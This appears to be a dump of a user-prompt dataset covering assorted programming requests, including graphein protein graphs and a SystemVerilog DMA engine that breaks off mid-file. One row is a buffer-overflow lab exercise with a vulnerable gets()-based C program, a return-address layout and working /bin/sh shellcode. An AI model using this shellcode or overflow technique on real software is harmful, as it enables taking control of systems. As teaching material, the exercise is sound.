row_id
int64 0
48.4k
| init_message
stringlengths 1
342k
| conversation_hash
stringlengths 32
32
| scores
dict |
|---|---|---|---|
46,687
|
The random, uniform generation of derangements is very simple. Since
Dn ≈ n!/e, the obvious procedure of generating a random permutation and
check if it is a derangement or not, and generating a new permutation in the
negative case, is straight-forward and guarantees a linear time complexity,
at least on the average; actually, as we will see, the average complexity is
µ1 ≈ e(n − 1).
give code for above
|
9bf96583f0b8ee5cb825e94c7edc3b32
|
{
"intermediate": 0.27354782819747925,
"beginner": 0.11506301909685135,
"expert": 0.61138916015625
}
|
46,688
|
Traceback (most recent call last):
File "C:\Users\Administrator\OneDrive\SHARE\BLURUSDT\blurusdt.py", line 430, in <module>
os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python3105\lib\os.py", line 542, in execl
execv(file, args)
OSError: [Errno 12] Not enough space
|
4a895a3c119af1e0f744d48fded6ad27
|
{
"intermediate": 0.4232935905456543,
"beginner": 0.29219454526901245,
"expert": 0.28451189398765564
}
|
46,689
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
Target function address is 08049196.
The following will try to help you understand structure of an attack string:
Stack layout of vulnerable program contains buf which is 4 bytes, Other vars which is 8 bytes, %ebp which is 4 bytes, %eip and &arg1 while the prompt function invoking. The goal is to overwrite the buffer until return address(%eip) on the stack has contains the target function address. One thing to be aware is the address in little-endian format. For example, if target address is ”0xdeadbeef”, then the bytes of return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode must contain buffer, return address %eip, nop nop nop....., injected code.
Overwrite the buffer in a specific way that:
Overwrite the buffer with padding.
Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
nops(0x90) can be filled in the between the return address and injected malicious code to increase the chance that injected malicious code will be executed. The nop instruction will do nothing but jump to the instruction.
The shellcode then provided as payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Write the attack program to generate the attack payload for this shellcode exploitation.
Providing the argument as ”shellcode” to the attack program must generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell_string" which stores the attack payload for launching the shellcode.
|
1ed04a255fec205b93b45143a4da3d8c
|
{
"intermediate": 0.5355784296989441,
"beginner": 0.25418639183044434,
"expert": 0.2102351188659668
}
|
46,690
|
User
from graphein.protein.graphs import read_pdb_to_dataframe, process_dataframe, deprotonate_structure, convert_structure_to_centroids, remove_insertions
from graphein.protein.graphs import construct_graph
from graphein.protein.visualisation import plotly_protein_structure_graph
import csv
# Your existing code to construct the graph
processing_funcs = [deprotonate_structure, convert_structure_to_centroids, remove_insertions]
pdb_code = "1A02" # Example PDB code
raw_df = read_pdb_to_dataframe(pdb_code=pdb_code)
df = process_dataframe(raw_df, atom_df_processing_funcs=processing_funcs)
g = construct_graph(pdb_code=pdb_code)
# Visualization code
p = plotly_protein_structure_graph(
g,
colour_edges_by="kind",
colour_nodes_by="degree",
label_node_ids=False,
plot_title="Residue-level graph",
node_size_multiplier=1
)
p.show()
# New code to store node data in a CSV file
with open('node_data.csv', 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["Node ID", "Node Data"]) # Write the header
for node, data in g.nodes(data=True):
writer.writerow([node, data]) # Write each node's ID and its data
Modify above code to extract more data, if possible all data from each node.
|
4e83e57ff8f71b53fdee8993ed9488cf
|
{
"intermediate": 0.5988343358039856,
"beginner": 0.191330224275589,
"expert": 0.20983541011810303
}
|
46,691
|
<<StartOfFile:DMAC/RTL/DMAC_CFG.sv>>>
module DMAC_CFG
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// configuration registers
output reg [31:0] src_addr_o,
output reg [31:0] dst_addr_o,
output reg [15:0] byte_len_o,
output wire start_o,
input wire done_i
);
// Configuration register to read/write
reg [31:0] src_addr;
reg [31:0] dst_addr;
reg [15:0] byte_len;
//----------------------------------------------------------
// Write
//----------------------------------------------------------
// an APB write occurs when PSEL & PENABLE & PWRITE
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// wren : _______----_____________________________
//
// DMA start command must be asserted when APB writes 1 to the DMA_CMD
// register
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// paddr : |DMA_CMD|
// pwdata : | 1 |
// start : _______----_____________________________
wire wren = psel_i & penable_i & pwrite_i;
always @(posedge clk) begin
if (!rst_n) begin
src_addr <= 32'd0;
dst_addr <= 32'd0;
byte_len <= 16'd0;
end
else if (wren) begin
case (paddr_i)
'h100: src_addr <= pwdata_i[31:0];
'h104: dst_addr <= pwdata_i[31:0];
'h108: byte_len <= pwdata_i[15:0];
endcase
end
end
wire start = wren & (paddr_i=='h10C) & pwdata_i[0];
//----------------------------------------------------------
// READ
//----------------------------------------------------------
// an APB read occurs when PSEL & PENABLE & !PWRITE
// To make read data a direct output from register,
// this code shall buffer the muxed read data into a register
// in the SETUP cycle (PSEL & !PENABLE)
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ________________________________________
// reg update : ___----_________________________________
// prdata : |DATA
reg [31:0] rdata;
always @(posedge clk) begin
if (!rst_n) begin
rdata <= 32'd0;
end
else if (psel_i & !penable_i & !pwrite_i) begin // in the setup cycle in the APB state diagram
case (paddr_i)
'h0: rdata <= 32'h0001_2024;
'h100: rdata <= src_addr;
'h104: rdata <= dst_addr;
'h108: rdata <= {16'd0, byte_len};
'h110: rdata <= {31'd0, done_i};
default: rdata <= 32'd0;
endcase
end
end
// output assignments
assign pready_o = 1'b1;
assign prdata_o = rdata;
assign pslverr_o = 1'b0;
assign src_addr_o = src_addr;
assign dst_addr_o = dst_addr;
assign byte_len_o = byte_len;
assign start_o = start;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_CFG.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
module DMAC_ENGINE
(
input wire clk,
input wire rst_n, // _n means active low
// configuration registers
input wire [31:0] src_addr_i,
input wire [31:0] dst_addr_i,
input wire [15:0] byte_len_i,
input wire start_i,
output wire done_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (W channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
// mnemonics for state values
localparam S_IDLE = 3'd0,
S_RREQ = 3'd1,
S_RDATA = 3'd2,
S_WREQ = 3'd3,
S_WDATA = 3'd4;
reg [2:0] state, state_n;
reg [31:0] src_addr, src_addr_n;
reg [31:0] dst_addr, dst_addr_n;
reg [15:0] cnt, cnt_n;
reg [3:0] wcnt, wcnt_n;
reg arvalid,
rready,
awvalid,
wvalid,
wlast,
done;
wire fifo_full,
fifo_empty;
reg fifo_wren,
fifo_rden;
wire [31:0] fifo_rdata;
// it's desirable to code registers in a simple way
always_ff @(posedge clk)
if (!rst_n) begin
state <= S_IDLE;
src_addr <= 32'd0;
dst_addr <= 32'd0;
cnt <= 16'd0;
wcnt <= 4'd0;
end
else begin
state <= state_n;
src_addr <= src_addr_n;
dst_addr <= dst_addr_n;
cnt <= cnt_n;
wcnt <= wcnt_n;
end
// this block programs output values and next register values
// based on states.
always_comb begin
// **********************
// **********************
// FILL YOUR CODE HERE
// **********************
// **********************
end
DMAC_FIFO u_fifo
(
.clk (clk),
.rst_n (rst_n),
.full_o (fifo_full),
.wren_i (fifo_wren),
.wdata_i (rdata_i),
.empty_o (fifo_empty),
.rden_i (fifo_rden),
.rdata_o (fifo_rdata)
);
// Output assigments
assign done_o = done;
assign awid_o = 4'd0;
assign awaddr_o = dst_addr;
assign awlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign awsize_o = 3'b010; // 4 bytes per transfer
assign awburst_o = 2'b01; // incremental
assign awvalid_o = awvalid;
assign wid_o = 4'd0;
assign wdata_o = fifo_rdata;
assign wstrb_o = 4'b1111; // all bytes within 4 byte are valid
assign wlast_o = wlast;
assign wvalid_o = wvalid;
assign bready_o = 1'b1;
assign arvalid_o = arvalid;
assign araddr_o = src_addr;
assign arid_o = 4'd0;
assign arlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign arsize_o = 3'b010; // 4 bytes per transfer
assign arburst_o = 2'b01; // incremental
assign arvalid_o = arvalid;
assign rready_o = rready & !fifo_full;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
module DMAC_FIFO #(
parameter DEPTH_LG2 = 4,
parameter DATA_WIDTH = 32
)
(
input wire clk,
input wire rst_n,
output wire full_o,
input wire wren_i,
input wire [DATA_WIDTH-1:0] wdata_i,
output wire empty_o,
input wire rden_i,
output wire [DATA_WIDTH-1:0] rdata_o
);
localparam FIFO_DEPTH = (1<<DEPTH_LG2);
reg [DATA_WIDTH-1:0] data[FIFO_DEPTH];
reg full, full_n,
empty, empty_n;
reg [DEPTH_LG2:0] wrptr, wrptr_n,
rdptr, rdptr_n;
// reset entries to all 0s
always_ff @(posedge clk)
if (!rst_n) begin
full <= 1'b0;
empty <= 1'b1; // empty after as reset
wrptr <= {(DEPTH_LG2+1){1'b0}};
rdptr <= {(DEPTH_LG2+1){1'b0}};
for (int i=0; i<FIFO_DEPTH; i++) begin
data[i] <= {DATA_WIDTH{1'b0}};
end
end
else begin
full <= full_n;
empty <= empty_n;
wrptr <= wrptr_n;
rdptr <= rdptr_n;
if (wren_i) begin
data[wrptr[DEPTH_LG2-1:0]] <= wdata_i;
end
end
always_comb begin
wrptr_n = wrptr;
rdptr_n = rdptr;
if (wren_i) begin
wrptr_n = wrptr + 'd1;
end
if (rden_i) begin
rdptr_n = rdptr + 'd1;
end
empty_n = (wrptr_n == rdptr_n);
full_n = (wrptr_n[DEPTH_LG2]!=rdptr_n[DEPTH_LG2])
&(wrptr_n[DEPTH_LG2-1:0]==rdptr_n[DEPTH_LG2-1:0]);
end
// synthesis translate_off
always @(posedge clk) begin
if (full_o & wren_i) begin
\$display("FIFO overflow");
@(posedge clk);
\$finish;
end
end
always @(posedge clk) begin
if (empty_o & rden_i) begin
\$display("FIFO underflow");
@(posedge clk);
\$finish;
end
end
// synthesis translate_on
assign full_o = full;
assign empty_o = empty;
assign rdata_o = data[rdptr[DEPTH_LG2-1:0]];
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_TOP.sv>>>
module DMAC_TOP
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (AW channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
wire [31:0] src_addr;
wire [31:0] dst_addr;
wire [15:0] byte_len;
wire start;
wire done;
DMAC_CFG u_cfg(
.clk (clk),
.rst_n (rst_n),
// AMBA APB interface
.psel_i (psel_i),
.penable_i (penable_i),
.paddr_i (paddr_i),
.pwrite_i (pwrite_i),
.pwdata_i (pwdata_i),
.pready_o (pready_o),
.prdata_o (prdata_o),
.pslverr_o (pslverr_o),
.src_addr_o (src_addr),
.dst_addr_o (dst_addr),
.byte_len_o (byte_len),
.start_o (start),
.done_i (done)
);
DMAC_ENGINE u_engine(
.clk (clk),
.rst_n (rst_n),
// configuration registers
.src_addr_i (src_addr),
.dst_addr_i (dst_addr),
.byte_len_i (byte_len),
.start_i (start),
.done_o (done),
// AMBA AXI interface (AW channel)
.awid_o (awid_o),
.awaddr_o (awaddr_o),
.awlen_o (awlen_o),
.awsize_o (awsize_o),
.awburst_o (awburst_o),
.awvalid_o (awvalid_o),
.awready_i (awready_i),
// AMBA AXI interface (W channel)
.wid_o (wid_o),
.wdata_o (wdata_o),
.wstrb_o (wstrb_o),
.wlast_o (wlast_o),
.wvalid_o (wvalid_o),
.wready_i (wready_i),
// AMBA AXI interface (B channel)
.bid_i (bid_i),
.bresp_i (bresp_i),
.bvalid_i (bvalid_i),
.bready_o (bready_o),
// AMBA AXI interface (AR channel)
.arid_o (arid_o),
.araddr_o (araddr_o),
.arlen_o (arlen_o),
.arsize_o (arsize_o),
.arburst_o (arburst_o),
.arvalid_o (arvalid_o),
.arready_i (arready_i),
// AMBA AXI interface (R channel)
.rid_i (rid_i),
.rdata_i (rdata_i),
.rresp_i (rresp_i),
.rlast_i (rlast_i),
.rvalid_i (rvalid_i),
.rready_o (rready_o)
);
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_TOP.sv>>>
<<<StartOfFile:DMAC/RTL/filelist.f>>>
-sverilog \$LAB_PATH/RTL/DMAC_TOP.sv
-sverilog \$LAB_PATH/RTL/DMAC_CFG.sv
-sverilog \$LAB_PATH/RTL/DMAC_ENGINE.sv
-sverilog \$LAB_PATH/RTL/DMAC_FIFO.sv
<<<EndOfFile:DMAC/RTL/filelist.f>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
interface AXI_AW_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic awvalid;
logic awready;
logic [ID_WIDTH-1:0] awid;
logic [ADDR_WIDTH-1:0] awaddr;
logic [3:0] awlen;
logic [2:0] awsize;
logic [1:0] awburst;
endinterface
interface AXI_W_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic wvalid;
logic wready;
logic [ID_WIDTH-1:0] wid;
logic [DATA_WIDTH-1:0] wdata;
logic [DATA_WIDTH/8-1:0] wstrb;
logic wlast;
endinterface
interface AXI_B_CH
#(
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic bvalid;
logic bready;
logic [ID_WIDTH-1:0] bid;
logic [1:0] bresp;
endinterface
interface AXI_AR_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic arvalid;
logic arready;
logic [ID_WIDTH-1:0] arid;
logic [ADDR_WIDTH-1:0] araddr;
logic [3:0] arlen;
logic [2:0] arsize;
logic [1:0] arburst;
endinterface
interface AXI_R_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic rvalid;
logic rready;
logic [ID_WIDTH-1:0] rid;
logic [DATA_WIDTH-1:0] rdata;
logic [1:0] rresp;
logic rlast;
endinterface
interface APB (
input clk
);
logic psel;
logic penable;
logic [31:0] paddr;
logic pwrite;
logic [31:0] pwdata;
logic pready;
logic [31:0] prdata;
logic pslverr;
modport master (
input clk,
input pready, prdata, pslverr,
output psel, penable, paddr, pwrite, pwdata
);
task init();
psel = 1'b0;
penable = 1'b0;
paddr = 32'd0;
pwrite = 1'b0;
pwdata = 32'd0;
endtask
task write(input int addr,
input int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b1;
pwdata = data;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
task read(input int addr,
output int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b0;
pwdata = 'hX;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
data = prdata;
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
endinterface
<<<EndOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
module AXI_SLAVE
#(
parameter ADDR_WIDTH = 16,
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH,
parameter AWREADY_DELAY = 1,
parameter ARREADY_DELAY = 1,
parameter AR2R_DELAY = 50
)
(
input wire clk,
input wire rst_n, // _n means active low
AXI_AW_CH aw_ch,
AXI_W_CH w_ch,
AXI_B_CH b_ch,
AXI_AR_CH ar_ch,
AXI_R_CH r_ch
);
localparam DATA_DEPTH = 1<<ADDR_WIDTH;
logic [7:0] mem[DATA_DEPTH];
function void write_byte(int addr, input bit [7:0] wdata);
mem[addr] = wdata;
endfunction
function void write_word(int addr, input bit [31:0] wdata);
for (int i=0; i<4; i++) begin
write_byte(addr+i, wdata[8*i +: 8]); // [i*8+7:i*8]
end
endfunction
function bit [7:0] read_byte(int addr);
read_byte = mem[addr];
endfunction
function bit [31:0] read_word(int addr);
for (int i=0; i<4; i++) begin
read_word[8*i +: 8] = read_byte(addr+i);// [i*8+7:i*8]
end
endfunction
//----------------------------------------------------------
// write channels (AW, W, B)
//----------------------------------------------------------
localparam logic [1:0] S_W_IDLE = 0,
S_W_AWREADY = 1,
S_W_BURST = 2,
S_W_RESP = 3;
logic [1:0] wstate, wstate_n;
logic [7:0] wcnt, wcnt_n;
logic [ADDR_WIDTH-1:0] waddr, waddr_n;
logic [ID_WIDTH-1:0] wid, wid_n;
logic [3:0] wlen, wlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
wstate <= S_W_IDLE;
wcnt <= 8'd0;
waddr <= {ADDR_WIDTH{1'b0}};
wid <= {ID_WIDTH{1'b0}};
wlen <= 4'd0;
end
else begin
wstate <= wstate_n;
wcnt <= wcnt_n;
waddr <= waddr_n;
wid <= wid_n;
wlen <= wlen_n;
end
always @(*) begin
wstate_n = wstate;
wcnt_n = wcnt;
waddr_n = waddr;
wid_n = wid;
wlen_n = wlen;
aw_ch.awready = 1'b0;
w_ch.wready = 1'b0;
b_ch.bvalid = 1'b0;
case (wstate)
S_W_IDLE: begin
if (aw_ch.awvalid) begin
if (AWREADY_DELAY == 0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = AWREADY_DELAY-1;
wstate_n = S_W_AWREADY;
end
end
end
S_W_AWREADY: begin
if (wcnt==0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = wcnt - 8'd1;
end
end
S_W_BURST: begin
w_ch.wready = 1'b1;
if (w_ch.wvalid) begin
for (int i=0; i<DATA_WIDTH/8; i++) begin
write_byte(waddr + i, w_ch.wdata[i*8 +: 8]); // [i*8+7:i*8]
end
waddr_n = waddr + (DATA_WIDTH/8);
if (wlen==4'd0) begin
wstate_n = S_W_RESP;
end
else begin
wlen_n = wlen - 4'd1;
end
end
end
S_W_RESP: begin
b_ch.bvalid = 1'b1;
if (b_ch.bready) begin
wstate_n = S_W_IDLE;
end
end
endcase
end
//----------------------------------------------------------
// read channel (AR, R)
//----------------------------------------------------------
localparam logic [1:0] S_R_IDLE = 0,
S_R_ARREADY = 1,
S_R_DELAY = 2,
S_R_BURST = 3;
logic [1:0] rstate, rstate_n;
logic [7:0] rcnt, rcnt_n;
logic [ADDR_WIDTH-1:0] raddr, raddr_n;
logic [ID_WIDTH-1:0] rid, rid_n;
logic [3:0] rlen, rlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
rstate <= S_R_IDLE;
rcnt <= 8'd0;
raddr <= {ADDR_WIDTH{1'b0}};
rid <= {ID_WIDTH{1'b0}};
rlen <= 4'd0;
end
else begin
rstate <= rstate_n;
rcnt <= rcnt_n;
raddr <= raddr_n;
rid <= rid_n;
rlen <= rlen_n;
end
always_comb begin
rstate_n = rstate;
rcnt_n = rcnt;
raddr_n = raddr;
rid_n = rid;
rlen_n = rlen;
ar_ch.arready = 1'b0;
r_ch.rvalid = 1'b0;
r_ch.rlast = 1'b0;
case (rstate)
S_R_IDLE: begin
if (ar_ch.arvalid) begin
if (ARREADY_DELAY == 0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = ARREADY_DELAY-1;
rstate_n = S_R_ARREADY;
end
end
end
S_R_ARREADY: begin
if (rcnt==0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_DELAY: begin
if (rcnt==0) begin
rstate_n = S_R_BURST;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_BURST: begin
r_ch.rvalid = 1'b1;
r_ch.rlast = (rlen==4'd0);
for (int i=0; i<DATA_WIDTH/8; i++) begin
r_ch.rdata[i*8 +: 8] = read_byte(raddr + i); // [i*8+7:i*8]
end
if (r_ch.rready) begin
raddr_n = raddr + (DATA_WIDTH/8);
if (rlen==4'd0) begin
rstate_n = S_R_IDLE;
end
else begin
rlen_n = rlen - 4'd1;
end
end
end
endcase
end
// output assignments
assign b_ch.bid = wid;
assign b_ch.bresp = 2'd0;
assign r_ch.rid = rid;
assign r_ch.rresp = 2'd0;
endmodule
<<<EndOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
`ifndef __AXI_TYPEDEF_SVH__
`define __AXI_TYPEDEF_SVH__
`define AXI_ADDR_WIDTH 32
`define AXI_DATA_WIDTH 32
`define AXI_ID_WIDTH 4
`endif /* __AXI_TYPEDEF_SVH__ */
<<<EndOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
<<<StartOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
`define IP_VER 32'h000
`define SRC_ADDR 32'h100
`define DST_ADDR 32'h104
`define LEN_ADDR 32'h108
`define STAT_ADDR 32'h110
`define START_ADDR 32'h10c
`define TIMEOUT_CYCLE 999999
module DMAC_TOP_TB ();
reg clk;
reg rst_n;
// clock generation
initial begin
clk = 1'b0;
forever #10 clk = !clk;
end
// reset generation
initial begin
rst_n = 1'b0; // active at time 0
repeat (3) @(posedge clk); // after 3 cycles,
rst_n = 1'b1; // release the reset
end
// enable waveform dump
initial begin
\$dumpvars(0, u_DUT);
\$dumpfile("dump.vcd");
end
// timeout
initial begin
#`TIMEOUT_CYCLE \$display("Timeout!");
\$finish;
end
APB apb_if (.clk(clk));
AXI_AW_CH aw_ch (.clk(clk));
AXI_W_CH w_ch (.clk(clk));
AXI_B_CH b_ch (.clk(clk));
AXI_AR_CH ar_ch (.clk(clk));
AXI_R_CH r_ch (.clk(clk));
task test_init();
int data;
apb_if.init();
@(posedge rst_n); // wait for a release of the reset
repeat (10) @(posedge clk); // wait another 10 cycles
apb_if.read(`IP_VER, data);
\$display("---------------------------------------------------");
\$display("IP version: %x", data);
\$display("---------------------------------------------------");
\$display("---------------------------------------------------");
\$display("Reset value test");
\$display("---------------------------------------------------");
apb_if.read(`SRC_ADDR, data);
if (data===0)
\$display("DMA_SRC(pass): %x", data);
else begin
\$display("DMA_SRC(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`DST_ADDR, data);
if (data===0)
\$display("DMA_DST(pass): %x", data);
else begin
\$display("DMA_DST(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`LEN_ADDR, data);
if (data===0)
\$display("DMA_LEN(pass): %x", data);
else begin
\$display("DMA_LEN(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`STAT_ADDR, data);
if (data===1)
\$display("DMA_STATUS(pass): %x", data);
else begin
\$display("DMA_STATUS(fail): %x", data);
@(posedge clk);
\$finish;
end
endtask
task test_dma(input int src, input int dst, input int len);
int data;
int word;
realtime elapsed_time;
\$display("---------------------------------------------------");
\$display("Load data to memory");
\$display("---------------------------------------------------");
for (int i=src; i<(src+len); i=i+4) begin
word = \$random;
u_mem.write_word(i, word);
end
\$display("---------------------------------------------------");
\$display("Configuration test");
\$display("---------------------------------------------------");
apb_if.write(`SRC_ADDR, src);
apb_if.read(`SRC_ADDR, data);
if (data===src)
\$display("DMA_SRC(pass): %x", data);
else begin
\$display("DMA_SRC(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.write(`DST_ADDR, dst);
apb_if.read(`DST_ADDR, data);
if (data===dst)
\$display("DMA_DST(pass): %x", data);
else begin
\$display("DMA_DST(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.write(`LEN_ADDR, len);
apb_if.read(`LEN_ADDR, data);
if (data===len)
\$display("DMA_LEN(pass): %x", data);
else begin
\$display("DMA_LEN(fail): %x", data);
@(posedge clk);
\$finish;
end
\$display("---------------------------------------------------");
\$display("DMA start");
\$display("---------------------------------------------------");
apb_if.write(`START_ADDR, 32'h1);
elapsed_time = \$realtime;
\$display("---------------------------------------------------");
\$display("Wait for a DMA completion");
\$display("---------------------------------------------------");
data = 0;
while (data!=1) begin
apb_if.read(`STAT_ADDR, data);
repeat (100) @(posedge clk);
end
@(posedge clk);
elapsed_time = \$realtime - elapsed_time;
\$timeformat(-9, 0, " ns", 10);
\$display("Elapsed time for DMA: %t", elapsed_time);
\$display("---------------------------------------------------");
\$display("DMA completed");
\$display("---------------------------------------------------");
repeat (len) @(posedge clk); // to make sure data is written
\$display("---------------------------------------------------");
\$display("verify data");
\$display("---------------------------------------------------");
for (int i=0; i<len; i=i+4) begin
logic [31:0] src_word;
logic [31:0] dst_word;
src_word = u_mem.read_word(src+i);
dst_word = u_mem.read_word(dst+i);
if (src_word!==dst_word) begin
\$display("Mismatch! (src:%x @%x, dst:%x @%x", src_word, src+i, dst_word, dst+i);
end
end
endtask
int src,
dst,
len;
// main
initial begin
test_init();
src = 'h0000_1000;
dst = 'h0000_2000;
len = 'h0100;
\$display("===================================================");
\$display("= 1st trial");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
src = 'h1234_1234;
dst = 'hABCD_ABCC;
len = 'h0F00;
\$display("===================================================");
\$display("= 2nd trial (long transfer)");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
src = 'h4278_0000;
dst = 'h4278_1000;
len = 'h0F10;
\$display("===================================================");
\$display("= 3rd trial (long transfer-2)");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
\$finish;
end
AXI_SLAVE u_mem (
.clk (clk),
.rst_n (rst_n),
.aw_ch (aw_ch),
.w_ch (w_ch),
.b_ch (b_ch),
.ar_ch (ar_ch),
.r_ch (r_ch)
);
DMAC_TOP u_DUT (
.clk (clk),
